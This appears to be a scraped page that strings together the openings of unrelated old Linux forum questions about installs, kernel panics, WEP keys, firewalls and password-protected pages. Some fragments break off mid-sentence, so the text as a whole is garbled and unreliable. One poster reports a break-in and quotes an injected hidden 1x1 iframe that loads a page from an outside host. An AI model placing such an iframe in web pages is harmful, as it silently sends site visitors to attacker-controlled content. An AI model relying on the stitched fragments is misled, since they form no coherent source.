linux-secure not available after install

I installed mandrake and had the linux-secure option without choosing any server options. My mouse had problems that I couldnt fix so I installed mandrake again EXACTLY the same way and this time I dont have the linux-secure option.

I tryed up fedora, redhat 9. 0, and redhat 8. 0 to 2. 6 but whenever i did it, after the grub it came to kernel panic i followed the steps Quote:1. download kernel source. tar. gz or. tar. bz2 format from for example there will be file like linux-2.

Someone entered my server doing something at all my site. Now if you go to my site pages there is this code in all page <IFRAME SRC=http//aspiron. ee/cj/out. php WIDTH=1 HEIGHT=1></IFRAME> but if i download a page to remove this line i can not find it.

WEP encryption key at start up

I'm using an Orinoco Gold card with 128 bit encryption with a Linksys Wireless-G router. Everything including WEP works well, but I have to manually activate with the encryption key after every boot for the internet to work.

Hi. i am a super nub to linux. Installed linux 8, and for some reason - does't matter which user i am logged on as (root/myself) - if i try to change the firewall rules using the gui provided in linux - the rules won't save.

Converting my web pages from NT 4. 0 to RH 9. 0. Manage to move the pages, and fix the hyperlinks, but I have some sections of the web pages that need access to only certain groups of people, so I need web pages that can be only accessed by passwords.

Red Hat 8.0 Firewall woes

I just installed RHL 8. 0 on a crappy old box. I intend to use it as a gateway and webserver and didn't install X. It doesn't have much RAM anyway. So, when I installed it, I selected the medium firewall setting, which apparently blocks all ports through 1023 and two more.
